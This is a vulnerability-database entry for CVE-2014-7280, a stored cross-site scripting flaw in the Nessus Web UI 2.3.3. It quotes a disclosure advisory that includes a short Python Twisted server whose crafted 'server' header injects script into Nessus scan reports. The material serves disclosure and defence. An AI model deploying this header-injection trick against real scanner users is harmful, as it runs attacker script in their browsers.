CVE-2014-7280

medium

Published 2014-10-21 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Cross-site scripting (XSS) vulnerability in the Web UI before 2.3.4 Build #85 for Tenable Nessus 5.x allows remote web servers to inject arbitrary web script or HTML via the server header.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34929 webapps multiple verified text · 2 KB

Frank Lycops · 2014-10-09

Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting

text exploit Source: Exploit-DB

Nessus Web UI 2.3.3: Stored XSS
=========================================================

CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version -

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
    def getResourceFor(self, request):
        request.setHeader('server', '<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0

    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"

log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.


-- Timeline --

2014-06-12   Release of Web UI version 2.3.3, build#83

2014-06-13        Vulnerability discovered and creation of POC

2014-06-13        Vulnerability responsibly reported to vendor

2014-06-13        Vulnerability acknowledged by vendor

2014-06-13        Release of Web UI version 2.3.4, build#85

2014-XX-XX        Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be

Application impact

Vendor	Product	Versions	Fixed
tenable	web_ui	`{"endIncluding":"2.3.3"}`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.